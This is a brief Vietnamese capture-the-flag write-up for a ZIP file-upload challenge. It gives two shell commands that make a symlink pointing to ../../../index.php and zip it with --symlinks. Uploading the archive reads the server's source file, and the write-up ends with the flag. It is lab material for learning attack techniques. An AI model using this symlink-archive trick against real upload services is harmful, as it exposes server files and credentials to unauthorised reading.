# File upload - ZIP

Sử dụng 2 command sau trong terminal:

```
ln -s ../../../index.php abc

zip --symlinks abc.zip abc
```
Upfile zip này lên và mở file có nhiều kí tự linh tinh

---

### Flag

`N3v3r_7rU5T_u5Er_1npU7`